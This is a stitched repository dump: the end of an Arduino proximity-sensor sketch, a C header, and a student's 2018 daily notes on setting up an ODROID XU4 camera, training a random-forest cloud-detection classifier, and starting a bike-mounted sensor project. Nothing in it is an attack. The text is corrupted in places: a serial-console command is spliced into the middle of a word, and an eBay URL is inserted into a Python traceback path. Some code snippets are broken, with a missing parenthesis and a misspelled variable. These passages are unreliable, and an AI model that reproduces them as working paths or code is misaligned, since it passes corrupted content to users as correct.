Serial.println("TMG3993 Proximity and RGBC");
Wire.begin();
if (sensor.initialize() == false)
{
Serial.println("Check Wiring");
}
sensor.setupRecommendedConfigForProximity();
sensor.enableEngines(ENABLE_PON | ENABLE_PEN | ENABLE_PIEN);
}
void loop()
{
if (sensor.getSTATUS() & STATUS_PVALID)
{
int proximity = sensor.getProximityRaw();
if (proximity < 50 && proximity_status == 0) {
Serial.println("Proximity Detected");
proximity_status = 1;
}
if (proximity > 50 && proximity_status == 1) {
Serial.println("Proximity Removed");
proximity_status = 0;
}
}
delay(1);
}
<file_sep>#ifndef JOBS_MINTS_H
#define JOBS_MINTS_H
#include <Arduino.h>
#include "devicesMints.h"
void initializeSerialMints();
void sensorPrintMints(String sensor,String readings[],uint8_t numOfvals);
// extern bool stringComplete;
// extern String inputString;
// void commandReadMints();
//
// void serialEvent();
#endif
<file_sep># Daily Notes
## 12th of June 2018
### Task 1: Installing an automated image collector using an XU4
The following is a description of the work done for the day.
#### Task 1.1 : Installing linux on an XU4
##### 1.1.1 Downloading the XU4 Image
- Download the linux image for the XU4 through: https://odroid.in/ubuntu_16.04lts/
- A compatible version of our choosing can be used.
eg.: https://odroid.in/ubuntu_16.04lts/ubuntu-16.04-minimal-odroid-xu3-20160706.img.xz <br />
**(Make sure to download a minimal version for the XU4)**
##### 1.1.2 Installing an Image flasher software
- GUI based image flasher software 'etcher' was downloaded via https://etcher.io/
- Once downlaoded, extract and run the said file.
##### 1.1.3 Flashing an SD Card
- Running the resulting file from the previous task gives a GUI directing on how to flash the sd card.
-- Need to chose the image file and the destination of the SD Card
##### 1.1.4 Installing Screen on Ubuntu
- run the following commands on the linux command window
```
sudo apt-get update
sudo apt-get install screen
```
##### 1.1.5 Setting up the USB-UART Module Kit
- Initially connect the UART through one of the USB ports on the PC.
- Check wehather its properly connected through by typing in ```lsusb ``` on the command window. The vendor and the product keys of the UART would be visible when done so.
- Then type in ```sudo modprobe usbserial vendor=0x1d09 product=0x4000 ```
in this example 1d09 is the vendor key and the product key is 4000. <br />
**Make sure to replace the vendor key and the product key with what you have**
- To figure out which USB port the UART is plugged in, use the command ``` dmesg ```
- Then type in ``` screen /dev/ttyUSB0 115200 ```
- The resulting screen is to be utilized as the main interface for the XU4. <br />
**Helpful Tutorial: https://www.youtube.com/watch?v=HuCh7o7OsGk**
##### 1.1.6 Booting the XU4
- Connect the SD card and the UART to the XU4.
- Connect Power. After the initial process, it will ask for a user name and password. Typically they will be as follows.
-- User Name: odroid
-- Password: <PASSWORD> <br/>
**(In some cases the username will be 'root')**
##### 1.1.7 Updating the XU4
- After logging in, type in ```sudo halt``` and provide the password if needed.
- The interface will let you know once the system is halted. Afterwards, remove power and connect the ethernet cable as well as the webcam.
- Reboot the XU4 by reconnecting power. Log in via the usual manner and update the system by running the following commands.
```
sudo apt-get update # Fetches the list of available updates
sudo apt-get upgrade # Strictly upgrades the current packages
sudo apt-get dist-upgrade # Installs updates (new ones)
````
### Task 2 : Installing other dependancies for the Automated Image Collector
#### 2.1 Installing Git
- run the following commands on the XU4 interface
```
sudo apt-get update
sudo apt-get install git-core
```
- to check the installation you can run ```git --version ```
#### 2.2 Installing fswebcam
- run the following commands on the XU4 interface
```
sudo apt-get update
sudo apt-get install fswebcam
```
### Task 3 :Setting up the Repository and setiing up a Cronjob
within the folder named 'offline image collector'
#### 3.1 Cloning the Git Repository
- Navigate to the home directory of the XU4
- Make a new directory named 'repos' via ``` mkdir repos ```
- Navigate to the cretaed directory via ``` cd repos```
- Clone the GIT Hub Repository via ``` git clone https://github.com/waggle-sensor/summer2018.git```
#### 3.2 Modifying the acquire_image.sh script
- Navigate to the directory where the shell script for the image colloector is placed <br/>
```cd /home/repos/summer2018/wijeratne/codes/offline_image_collector/```
- Make a new folder to store the files ``` mkdir Photos ```within the folder named 'offline image collector'.
- Open the shell script through nano by typing in ``` nano acquire_images.sh ``` again within the folder named 'offline image collector'.
- Replace the whole script by the follwoing code on the file 'acquire_images.sh'
```
#!/bin/sh
fswebcam --png 0 --device /dev/video0 --skip 4 --input 0 --resolution 640x480 --no-banner --save /home/waggle/photos/Cloud_Pic_%Y_%m_%d_%H_%M_%S.png
```
- Save the modified file on the same folder and run the command ``` chmod +x acquire_images.sh``` to have execute permissions for the script.
#### 3.3 Setting up the cronjob
- Type in the follwing code to set up a crontab:
``` crontab -e ```
- Give in the following cronjob in the resulting window: <br/>
``` */5 * * * * cd /home/repos/summer2018/wijeratne/codes/offline_image_collector && ./acquire_image.sh ```
- Finally save the cron job <br/>
**(Check up on the folder named 'photos' every 5 minutes to see if the images are being saved.)** <br/> <br/>
## 14th of June 2018
The follwing tasks are geared towards having XU4 outside so that it will have a collection of photos that will be used to verify the cloud detection script.
### Task 4: Placing the XU4 which is connected to a camera outside.
#### 4.1 Doing a temporory housing for the XU4 and placing it outside
- Use a plastic tool holder to work as the housing.
- Leave a dome which is used in the actual sensor ontop of the camera for consistancy.
- Place the temporory housing outside. Reboot the XU4 and leave eit out for a few hours.<br/>
**(Make sure to check the weather before placing it outside)**
#### 4.2 Installing nmap
- run the following commands on the Linux Command Line
```
sudo apt-get update
sudo apt-get install nmap
```
#### 4.3 Finding the ip address of the Desktop
- Type in ```ifconfig``` on the Desktop to figure out the ip address of the current machine. The output will be as follows.
```
eno1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.144 ....
```
The set of numbers infront of the key inet gives the ip of the current machine. In this example the ip of the current machine is '10.10.10.144'. <br />
#### 4.4 Scan the network for the XU4
- Connect the XU4 to the router which the desktop is hooked up.
- On the linux Command line type in ```nmap 192.168.1.0-255 -p 80 ```. This will scope through all the ip addresses connected to the router.``` - p 80 ``` added to avoid listing all ports of a given ip.
- Record the IP address for the XU4
#### 4.5 Connect to the XU4 though SSH
- On the command line of the PC type in ```ssh root@192.168.1.55```
in this example the user name and the password for the XU4 are 'root' and '<PASSWORD>'. <br />
**Make sure to replace the username and the password with what you have** <br />
- type ``` exit``` to come back to the local machine.
#### 4.6 Downloading the folder with the photos from the XU4
- On the command line of the PC type in <br/>
```
scp -r root@192.168.1.55:/home/repos/summer2018/wijeratne/codes/offline_image_collector/photos /home/lakithaomal/repos/summer2018/wijeratne/codes/cloud_detection
```
In this example the XU4 ip address is *192.168.1.55* ,the XU4 Directory is which the files are copied from is */home/repos/summer2018/wijeratne/codes/offline_image_collector/photos* and the XU4 user name is *root*. The desination of the host PC is */home/lakithaomal/repos/summer2018/wijeratne/codes/cloud_detection*. <br />
**Make sure to modify the usernames and the directories with the appropriate credentials**
- Check to see if the files are copied into the local directory.
## 15th of June 2018
The folling tasks are geared upon the initiation of the Bike Bottle Sensor Project.
### Task 5 : Documentation of the Bike Bottle Sensor Design
#### 5.1 Doing the Bike Bottle Design Overveiw
- Define the constraints and the necessary objectives of the proposed project<br />
**The link to the said docuement is found [here](https://github.com/waggle-sensor/summer2018/tree/master/wijeratne/codes/bike_bottle_design)**
(Further modifications were made after contatcting Prof. Lary)
The folling tasks are geared towards checking the Accuracy of the Cloud Detection App.
### Task 6 : Verification of the Cloud Detector App
#### 6.1 Getting the Images ready for verification
- For the verification process an ordered set of images are needed. The Images downloaded from the XU4 are named randomly. As such the said images are renamed in an orderly manner using the code given **[here](https://github.com/waggle-sensor/summer2018/blob/master/wijeratne/codes/cloud_detection/python/Renaming.py)**
- The renamed files contain a timestamp which is displayed on the lower right hand corner of each image. This which will interefear with the prediction. As such the resulting files are croped via the code found **[here](https://github.com/waggle-sensor/summer2018/blob/master/wijeratne/codes/cloud_detection/python/Image_Cropper.py)**
## 18th - 22nd of June 2018
#### 6.2 Downloading pre classified data for verification
- A data set which is pre classified for the the task at hand can be found [here](http://vintage.winklerbros.net/swimseg.html).
On this link, fill in a seprate form as par a request for the data set featured. Once a request is sent, and email with the data set requested will be sent.
### Task 7 : Writing a separate App to Distinguish between Clouds and Sky pixels
The paper provided in this [link](http://vintage.winklerbros.net/Publications/jstars2017.pdf) gives a distinct way in which the classification can be done. The study is based on a method where each pixel is handled individually contarary to the usual means of image segmentation. The following is a description of the implimentation discussed in the paper.
**The data set provided by the [Singapore Whole sky IMaging SEGmentation Database](http://vintage.winklerbros.net/swimseg.html)
contained 1000 images. Due to resource constraints, the initial study is doen using only 300 images.**
#### 7.1 Training a Random Forest Classifier
The python script written to train a Random Forest Classifier is described here.
- Initially the color spaces are separated for all the images. These color spaces used are listed below.
- RGB Color SPace
- HSV Color Space
- LAB Colour Space
The following scripts were used to gain seprated colour space images:
```
Input_Image_RGB = cv2.cvtColor(Input_Image, cv2.COLOR_BGR2RGBA)
# Gaining HSV Images
Input_Image_HSV = cv2.cvtColor(Input_Image, cv2.COLOR_BGR2HSV)
# Gaining LAB Images
RGB_for_LAB = io.imread(input_path)
Input_Image_LAB = color.rgb2lab(RGB_for_LAB)
```
- These were converted into Arrays using numpy via the script ``` np.array()```. In order to get separate feature vectors for a given pixel each dimention of all color spaces are converted into 1D arrays via these scripts.
```
# Converting Each Image into 1D Vectors
One_D_Image_Red = np.transpose(np.matrix(Image_Array_RGB[:, :, 0].ravel()))
One_D_Image_Green = np.transpose(np.matrix(Image_Array_RGB[:, :, 1].ravel()))
One_D_Image_Blue = np.transpose(np.matrix(Image_Array_RGB[:, :, 2].ravel()))
One_D_Image_H = np.transpose(np.matrix(Image_Array_HSV[:, :, 0].ravel()))
One_D_Image_S = np.transpose(np.matrix(Image_Array_HSV[:, :, 1].ravel()))
One_D_Image_V = np.transpose(np.matrix(Image_Array_HSV[:, :, 2].ravel()))
One_D_Image_L = np.transpose(np.matrix(Image_Array_LAB[:, :, 0].ravel()))
One_D_Image_A = np.transpose(np.matrix(Image_Array_LAB[:, :, 1].ravel()))
One_D_Image_B = np.transpose(np.matrix(Image_Array_LAB[:, :, 2].ravel()))
```
-The final feature vector composed of these inputs as well as the ratio of Red to Blue Pixel values, the difference of Red to blue pixels and two other features which comprised of red and blue colour pixel values.
The follwing code is used to gain the complete feature vector for a given pixel
```
# Writing the full Feature Vector
One_D_Image = np.hstack((One_D_Image_Red, One_D_Image_Green, One_D_Image_Blue,\
One_D_Image_H, One_D_Image_S, One_D_Image_V, \
One_D_Image_L, One_D_Image_A, One_D_Image_B, \
One_D_Image_Red/One_D_Image_Blue, np.subtract(One_D_Image_Red, One_D_Image_Blue), \
(One_D_Image_Blue-One_D_Image_Red)/(One_D_Image_Blue+One_D_Image_Red),\
One_D_Chroma
))
```
**Due to resource constraints a lesser number of features may be used for the final study**
- Using the target images a target feature vector is aquired. The code was designed in a manner where in which each cloud pixel will have a value 1 and each sky pixel will have value 0. The follwing is the script used:
```
# For a Given Image a Target Vector is Generated
Input_Image_Binary = cv2.imread(input_path)
Image_Array_Binary = np.array(Input_Image_Binary)
Image_Shape = Image_Array_Binary.shape
One_D_Binary = np.transpose(np.matrix(Image_Array_Binary[:, :, 1].ravel()))
One_D_Binary = One_D_Binary.astype(float) / 255
```
- Once all feature vectors and target vectors are concatinated, A random Tree Classifier is trained and saved for later use. The implimentation is as follows:
```
# Instantiate model with 10 decision trees
Random_Forest_Model = RandomForestRegressor(n_estimators=10, random_state=42)
# Train the model on training data
Random_Forest_Model.fit(All_Features_Training, np.ravel(All_Targets_Training, order='C'))
# Saving the Model
Model_Save_File_Name = 'Cloud_App_Via_Sklearn_Model.sav'
pickle.dump(Random_Forest_Model, open(Model_Save_File_Name, 'wb'))
```
#### 7.2 Verification of the Random Forest Classifier
- On the previous step the around 300 images provided were divided into training and testing sets using
```Train_Index, Test_Index = train_test_split((Indexes), test_size = 0.3, random_state = 42) ```
For this study the testing data set contained around 30% percent of the total data set.
- On this module initially the trained Random Forest Classifier is loaded via
```
Model_Save_File_Name = 'Cloud_App_Via_Sklearn_Model.sav'
loaded_Random_Tree = pickle.load(open(Model_Save_File_Name, 'rb'))
```
- Following is a description of the Feature Vectors and Target Vectors gained within the script:
-- Each pixel of the Training data set images are saved as ```All_Features_Training```
-- Each pixel of the Testing data set images are saved as ```All_Features_Testing```
-- True classifications of the Training images are saved as ```All_Targets_Training ```
-- True classifications of the Testing images are saved as ```All_Targets_Testing```
- Using the loaded Random Forest Classifier and the featscreen /dev/ttyUSB0 115200ure Vectors Specified, Predictions are made usind the following scripts. Separate studies were done for the Training and Testing data sets.
```
Predictions_Pre_Training = loaded_Random_Tree.predict(All_Features_Training)
Predictions_Training = np.transpose(np.matrix(np.array(Predictions_Pre_Training)))
Predictions_Pre_Testing = loaded_Random_Tree.predict(All_Features_Testing)
Predictions_Testing = np.transpose(np.matrix(np.array(Predictions_Pre_Testing)))
```
- Since the predictions needed to be binary for verication, they were modified accordingly.
```
Predictions_Training[Predictions_Training < 0.5] = 0
Predictions_Training[Predictions_Training >= 0.5] = 1
Predictions_Testing[Predictions_Testing < 0.5] = 0
Predictions_Testing[Predictions_Testing >= 0.5] = 1
```
The Accuracies for the Training and Testing data are recorded using the folling scripts.
```
Correct_Predictions_Training = sum(Predictions_Training == All_Targets_Training)
print("Training Accuracy Sklearn:", Correct_Predictions_Training/len(All_Targets_Training))
Correct_Predictions_Testing = sum(Predictions_Testing == All_Targets_Testing)
print("Testing Accuracy Sklearn:", Correct_Predictions_Testing / len(All_Targets_Testing))
```
#### 7.3 Figuring out the most importaint features
The Random Forest Classifier is capable of giving a rank to each Feature with respective to there imporatance in the classification. The following script is used to obtain the importance rank of each feature.
```
Importances = list(loaded_Random_Tree.feature_importances_)
Features_Description = ["Red", "Green", "Blue", \
"H", "S", "V", \
"L", "A", "B", \
"Red/Blue", "Red-Blue", \
"(Blue-Red)/(Blue+Red)", \
"Chroma"]
Features_Description_Array = np.array(Features_Description)
Features_Description_List = list(Features_Description)
# List of tuples with variable and importance
Feature_Importances = [(feature, round(importance, 2)) for feature, importance in
zip(Features_Description_List, Importances)]
Feature_Importances = sorted(Feature_Importances, key=lambda x: x[1], reverse=True)
```
The follwing Graph depicts the Importance each feature.

**These results may be useful, if lessor number of features are to be used due to resasource constraints**
#### 7.4 Comparison to the Caffe Classifier
A separate classification is done using the Caffe Classifier. Further details on the Caffe Classification can be found [here](https://github.com/waggle-sensor/plugin_manager/tree/master/plugins/openCV). Using the images gained from the caffe classification , a separate veification is done using the SWMSEG Data set. The verication is done using the same means discussed for the Sklearn(Random Forest Classifier).
The Following table compares the predictions made through either classifier.
| Accuracy Estimations | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Caffe (Superpixel Algorythm) | 80% | 84% |
| Sklearn (Random Forest) | 90% | 85% |
| [Confusion Matrices] | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Caffe (Superpixel Algorythm) |  |  |
| Sklearn (Random Forest) | |  |
| [Confusion Matrices Normalized] | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Caffe (Superpixel Algorythm) |  |  |
| Sklearn (Random Forest) | |  |
#### 7.5 Writing the final Module
The post processing via the resulting image of the Sklearn Classifier is done through this model. The eventual results that are to be obtained are as follows.
- Cloud Percentage of the sky
- For the Sky pixels,
- Average pixel value in Blue
- Average pixel value in Green
- Average pixel value in Red
- For the Cloud pixels,
- Average pixel value in Blue
- Average pixel value in Green
- Average pixel value in Red
A description of how these were calculated are given below:
- Initially the image to be studied is loaded via a system Argument.
```
path_src = sys.argv[1]
Original_Image = cv2.imread(path_src)
```
- From the premade Sklearn module, the prediction is made isitailly done. The module is loaded via pickle. Afterward , the usual preprocessing of the prediction is done.
```
print("Loading the Random Forest Model")
Model_Save_File_Name = 'Cloud_App_Via_Sklearn_Model_Reduced.sav'
loaded_Random_Tree = pickle.load(open(Model_Save_File_Name, 'rb'))
print("Done Loading")
# Gaining The Prediction
print("Gaining the Prediction...")
Prediction = loaded_Random_Tree.predict(Features)
Prediction = np.transpose(np.matrix(np.array(Prediction)))
Prediction[Prediction < 0.5] = 0
Prediction[Prediction >= 0.5] = 1
```
- At this point a the cloud percentate of the sky is gained via ```Cloud_Percentage = sum(Prediction)/len(Prediction)```
- A separate mask of similar size of the original image is made. The said mask will have 1's for cloud pixels and 0's for sky pixels. Then its mulitplied by the orginal image via ``` Only_Clouds = cv2.multiply(Original_Image_float, Cloud_Pixels_Normalized) ``` . The resulting image is used to gain the average pixel values of clouds.
The follwing scripts illustrates the process,
```
# Summing up the pixel values for each Pallaette
Color_Sum_Blue_Sky = Only_Sky[:,:,0].sum()
Color_Sum_Green_Sky = Only_Sky[:,:,1].sum()
Color_Sum_Red_Sky = Only_Sky[:,:,2].sum()
Cloud_Pixel_Count = np.sum(Binary_Image[:,:,0] == 255
Average_Pixel_Value_Blue_Sky = Color_Sum_Blue_Sky/Sky_Pixel_Clount
Average_Pixel_Value_Green_Sky = Color_Sum_Green_Sky/Sky_Pixel_Clount
Average_Pixel_Value_Red_Sky = Color_Sum_Red_Sky/Sky_Pixel_Clount
```
- Similar Measures were taken to gain the Average Pixels values of the sky.
- An example of an imlpimentation of the module is given below,
```
python CloudApp_Final_Module_Reduced.py 0001.png
Loading the Random Forest Model
Done Loading
Gaining the Prediction...
Writing Resulting Images ...
Percentage of Clouds: 0.7765027777777778 %
Average Pixel Value in Blue for the Sky: 139.52020283622716
Average Pixel Value in Green for the Sky: 108.23629426167365
Average Pixel Value in Red for the Sky: 86.56886115909967
Average Pixel Value in Blue for the Clouds: 154.18068190354904
Average Pixel Value in Green for the Clouds: 130.44013579403378
Average Pixel Value in Red for the Clouds: 114.31494127873907
```
## 25th of June 2018
Continuing on the Cloud Detection Verification
### Task 8 : Writing a modified version of the Cloud/Sky Classifier
The training set contained 1013 images, each having 600* 600 pixels. As such the feature data set contained 600 * 600 * 1013 rows and 14 columns. To have a managable data set for training the number of features used were reduced using the study done for the most importaint features on [task 7.3](#user-content-73-figuring-out-the-most-importaint-features). For the final training feature set only 6 features were used. They are listed below,
- Blue Pixel Value
- Blue Pixel Value(From LAB)
- Red Pixel Value/Blue Pixel Value
- Red Pixel Value - Blue Pixel Value
- Blue Pixel Value-Red Pixel Value)/(Blue Pixel Value+Red Pixel Value),
- Chroma Value - (Max(RGB)-Min(RGB))
No further modification to the initial study was made.
- Updated Results for the complete data set are as follows:
| Accuracy Estimations | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Caffe (Superpixel Algorythm) | 79% | 80% |
| Sklearn (Random Forest) | 89% | 89% |
| [Confusion Matrices] | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Caffe (Superpixel Algorythm) |  |  |
| Sklearn (Random Forest) | |  |
| [Confusion Matrices Normalized] | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Caffe (Superpixel Algorythm) |  |  |
| Sklearn (Random Forest) | |  |
For the updated feature set, the Importance of each feature is also obtained for completeness. They are given on the following graph:

Following are some sample images
## 26th-29th of June 2018
Thefolloing tasks are geared towards Importing the Classifier to an XU4
### Task 9 : Installing dependancies on the XU4
#### 9.1 Intalling pip
```
sudo apt-get install python3-pip
```
#### 9.2 Installing numpy and scipy
```
sudo apt-get install python3-numpy
sudo apt-get install python3-scipy
```
#### 9.3 Installing sklearn
```
sudo apt-get install scikit-learn
```
#### 9.4 Installing skimage
```
sudo apt-get install python3-skimage
```
#### 9.5 Installing open CV
- Unfortunately open CV had to be installed from ground up(Probably because of the use of the reduced image).
This [link](http://www.python36.com/how-to-install-opencv340-on-ubuntu1604/) was used as a reference here.
```
sudo apt-get install build-essential
sudo apt-get install cmake git libgtk2.0-dev pkg-config libavcodec-dev libavformat-dev libswscale-dev
sudo apt-get install python-dev python-numpy libtbb2 libtbb-dev libjpeg-dev libpng-dev libtiff-dev libjasper-dev libdc1394-22-dev
sudo apt-get install libavcodec-dev libavformat-dev libswscale-dev libv4l-dev
sudo apt-get install libxvidcore-dev libx264-dev
sudo apt-get install libgtk-3-dev
sudo apt-get install libatlas-base-dev gfortran pylint
```
- On the follwoing command make sure to match the python installations within the XU4
```
sudo apt-get install python2.7-dev python3.5-dev
```
For the current install of the Ubuntu image python 2.7 and python 3.5 was embedded within.
- Download OpenCV 3.4.0
```
wget https://github.com/opencv/opencv/archive/3.4.0.zip -O opencv-3.4.0.zip
wget https://github.com/opencv/opencv_contrib/archive/3.4.0.zip -O opencv_contrib-3.4.0.zip
```
- Install Unzip
```
sudo apt-get install unzip
```
- Extracting the files
```
unzip opencv-3.4.0.zip
unzip opencv_contrib-3.4.0.zip
```
- Creating the build directory inside OpenCV-3.4.0:
```
cd opencv-3.4.0
mkdir build
cd build
```
- Configuring cmake:
```
cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_INSTALL_PREFIX=/usr/local -DOPENCV_EXTRA_MODULES_PATH=../../opencv_contrib-3.4.0/modules -DOPENCV_ENABLE_NONFREE=True ..
```
- Finally doing the install
```
make -j8
```
Here 8 is the number of cores present(Since XU4 has 8 cores).
Concluding the installation
```
sudo make install
```
- Reinitialize static libs
```
sudo ldconfig
```
#### 9.6 Exporting the classifier into the XU4
- Creating a directory for the classifier to stored
On the home directory , type in the follwoing commands
```
mkdir waggle
cd waggle
mkdir RT_Claassifier
```
- The next step is done on the host machine where the cloudApp Final module is saved. On the directory where the cloudapp is save type in and execute the follwing command
```
scp CloudApp_Final_Module_for_NB.py root@10.10.10.136:/home/waggle/RT_Classifier
```
- Exporting a sample image
```
scp 0003.png root@10.10.10.136:/home/waggle/RT_Classifier
```
For the last two steps approprate ip addess for the XU4 must be used. On this instance, the ip address of the XU4 is 10.10.10.136. **Make sure to have the XU4 connected to the same network as the PC**
### Task 10: Testing the Classifier on the XU4
On the XU4 command window type in
```
python3 CloudApp_Final_Module_for_NB.py 0003.png
```
Unfortunately this yeilded an error message which ended with
```
Traceback (most recent call last):
File "CloudApp_Final_Module_for_Pkl.py", line 154, in <module>
loaded_Random_Tree = joblib.load(Model_Save_File_Name)
File "/usr/local/lib/https://www.ebay.com/itm/202218965829python3.5/dist-packages/sklearn/externals/joblib/numpy_pickle.py", line 578, in load
obj = _unpickle(fobj, filename, mmap_mode)
File "/usr/local/lib/python3.5/dist-packages/sklearn/externals/joblib/numpy_pickle.py", line 508, in _unpickle
obj = unpickler.load()
File "/usr/lib/python3.5/pickle.py", line 1039, in load
dispatch[key[0]](self)
File "/usr/lib/python3.5/pickle.py", line 1394, in load_reduce
stack[-1] = func(*args)
File "sklearn/tree/_tree.pyx", line 601, in sklearn.tree._tree.Tree.__cinit__
ValueError: Buffer dtype mismatch, expected 'SIZE_t' but got 'long long'
```
A bit of research into the said problem revealed that the classifier had to be trainined in a machine which matched the internal architecture of the XU4(32 bit). Unfortunately this was a complication which couldnt be resolved.
### Task 11 : Trying out other Classifiers.
Using the same means as the Random Forest Classifier, a Naive baised Classification was done. The Naive baised classification was implimented within the XU4 with the use of the preceeding steps speicified. The follwing represent the validation study done for the said Classifier.
| [Confusion Matrices] | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Sklearan (Naive Baiysed) |  |  |
| [Confusion Matrices Normalized] | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Sklearan (Naive Baiysed) |  |  |
The updated accuracies for all 3 classifiers studied.
| Accuracy Estimations | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Caffe (Superpixel Algorythm) | 80% | 84% |
| Sklearn (Random Forest) | 90% | 89% |
| Sklearn(Naive Baised) | 87% | 88% |
## July 2 - July 10th
Getting back on track with the bike waggle project.
### Task 11 Starting off with the Bike Bottle Design
#### Task 11.1 : Deciding on the Sensor Brain
The initail decision was made to esu the https://www.particle.io/ platform for the sensor brain. They provide two options.
- Particle Photon : Works with Wi - Fi (https://docs.particle.io/datasheets/photon-(wifi)/photon-datasheet/)
- Particle Electron : Works on Cellular Data (https://docs.particle.io/datasheets/electron-(cellular)/electron-datasheet/)
Finalized on taking on the Photon, since we wont have to pay for Cellular.
A modification of the code done by the high school students for the Photon can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/sensorgram/sensogram-main-1.ino)
#### Task 11.2: Deciding on the Sensors to Use
The information on the decided sensors can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/Technical_Specs.md).
#### Task 11.3: Writing the base code
The iterations on the codes done can be found [here](https://github.com/waggle-sensor/summer2018/tree/master/bike_waggle/sensorgram).
## July 11
Getting back on the Cloud Detection App
### Task 12 : Cloud App Conclusion
#### Task 12.1: Instaling a Waggle image on the XU4
The Waggle Image was downloaded to the local PC with the help of Chris.
The rest of the steps were done using the guide provided [here](https://github.com/waggle-sensor/summer2018/tree/master/chen/waggle_image#burning-image-to-microsd)
#### Task 12.2: Pushing the CloudyApp into the XU4
Make sure to have an ethernet adaptor in this case. Usual ethernet connection wont work since the waggle image is programmed only to listen to Beehive.
Using an ethernet Adaptor you may scp the sample image,the module file and the python script file onto the XU4.
```
scp Cloud_App_Final_Module_for_NB.py root@10.10.10.101:/home/waggle/Cloud_Detection_App
scp 0937.png root@10.10.10.101:/home/waggle/Cloud_Detection_App
```
#### Task 12.3: Installing Dependancies
##### Task 12.3.1 Installing numpy and scipy
```
sudo apt-get install python3-numpy
sudo apt-get install python3-scipy
```
##### Task 12.3.2 Installing sklearn
```
sudo apt-get install scikit-learn
```
##### Task 12.3.4 Installing skimage
```
sudo apt-get install python3-skimage
```
#### Task 12.4: Testing the program on the XU4
The cloudy app progam based on the Naive Baised Classifier was successfully tested out on the waggle image. The next step is to test out the program within the Waggle Image pipeline on the Edge Processor.
## July 12
Testing the Cloud Detection App within the Waggle image Pipeline
#### Task 12.5: Research on the Waggle Image Pipeline
The follwing set of links were examined to gain an idea of the inner processors within Waggle Image Pipeline.
- [Pipeline architecture](https://github.com/waggle-sensor/edge_processor/tree/master/image)
- [Image Detector Plugin](https://github.com/waggle-sensor/plugin_manager/tree/master/plugins/image_detector)
#### Task 12.6: Embedding Cloudy App Code within the Current Image Exporter Tool
The Image pipeline works on 3 main components,
- [Image Producer](https://github.com/waggle-sensor/edge_processor/tree/master/image/producer)
- [Image Pipeline](https://github.com/waggle-sensor/edge_processor/tree/master/image/pipeline)
- [Image Exporter](https://github.com/waggle-sensor/edge_processor/tree/master/image/exporter)
The image exporter was to be the vaible candidate for the Cloud App to be pluged in as at this stage the image data was actually converted into an image. Using the code done for the [image exporter](https://github.com/waggle-sensor/edge_processor/blob/master/image/exporter/image_exporter.py), a test code was written.
The test code can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/wijeratne/codes/cloud_detection/Sklearn/Naive_Baised_Classifier/Sklearn_Image_Maker_for_SWMSEG_NB.py).
## July 13 - 15
Continuing on the Bike Waggle Project
### Task 13 - Writing Quotation for the Bike Waggle Project
A Quotation was made to get a shipment of the devices needed for the bike Waggle Sensor. The said quatation can be found [here](https://docs.google.com/spreadsheets/d/13GMrc0lDrT8yg4jRUNnsqN4OhRasOGfK-BKTgsxrhDE/edit#gid=0)
- A detailed list of the devices to be used can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/Technical_Specs.md)
### Task 14 - Modyfing the Sensogram Code for the Bike Waggle Sensor
Iteration 3 of the bike waggle code was completed. The summary of the said iteration is given below. These descriptions can also be found within the [bike waggle](https://github.com/waggle-sensor/summer2018/tree/master/bike_waggle) project folder.
###### Verision Date : 07/15/2018
Additions: On this iteration the case where there is no connectivity is considered. On Iteration 2 each sensorgram was published individually. The current iteration works on publishing multiple sensorgrams instantaneously(Through individual
publish statements).
**NOTE: It was uncovered for each event around 9 sensograms[255 charactors] can be published. As such live data only takes 5 seconds
to publish(since we only have 42 sensor inputs).**
On iteration 4, The mechanism in which the sampling time is read may be modified. Wheather the packing time differs from the time in which the data is read will be invistigated. This may have to wait till the physical device is made.
**The Source Code can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/sensorgram/sensogram-main-3.ino)**
## July 16 - 19
### Task 15: Setting up a SD card logger for the Bike Waggle Project.
#### Task 15.1 - Research on the "SdCardLogHandlerRK" Lybrary
The lybrary worked quite well at first glance. The initial code had the capabilities of creating and making logs for the data inputs given. However the said lybrary is meant to be used for debugging the Photon. As such the programmed photon logged a lot of unnecessary data such as infromation on wi fi connectity and error messages. The code also utilized the SDfat Lyrbrary used in photon devices.
The sample code used is given below.
```
// This #include statement was automatically added by the Particle IDE.
#include <SdCardLogHandlerRK.h>
// This #include statement was automatically added by the Particle IDE.
#include <SdFat.h>
#include "Particle.h"
#include "SdFat.h"
#include "SdCardLogHandlerRK.h"
SYSTEM_THREAD(ENABLED);
const int SD_CHIP_SELECT = D5;
SdFat sd(1);
SdCardLogHandler logHandler(sd, SD_CHIP_SELECT, SPI_FULL_SPEED,LOG_LEVEL_INFO);
//STARTUP(logHandler.withNoSerialLogging());// Dont have serial loging
STARTUP(logHandler.withDesiredFileSize(50000).withMaxFilesToKeep(5).withLogsDirName("Bike_Waggle_Logs_LAKITHA_3").withNoSerialLogging());
Logger LogToSD("app.sd");
size_t counter = 0;
void setup() {
Serial.begin(9600);
}
void loop() {
Log.info("testing counter=%d", counter++);
LogToSD.info("write to SD counter=%d", counter);
delay(100000);
}
```
The Git repository for the said lybrary can be found [here](https://github.com/rickkas7/SdCardLogHandlerRK)
The pins used under the SPI(1) interface is defined below.
| Photon | SPI Name | SD Reader |
| ------ | -------- | --------- |
| D5 | SS | CS |
| D4 | SCK | SCK |
| D3 | MISO | DO |
| D2 | MOSI | DI |
| 3V3 | | VCC |
| GND | | GND |
| | | CD |
Due to the lack of control of which messages to log a more primitive Sd Card logging lyrary was looked up.
#### Task 15.2 - Research on the "SDFat" Lybrary
SDFat lybrary turned out to be extremely stable and it provided the control that the user lacked on the previous lybraries.
The sample code inititally used is found below.
```
// This #include statement was automatically added by the Particle IDE.
#include <SdFat.h>
#include "SdFat.h"
// Pick an SPI configuration.
// See SPI configuration section below (comments are for photon).
#define SPI_CONFIGURATION 0
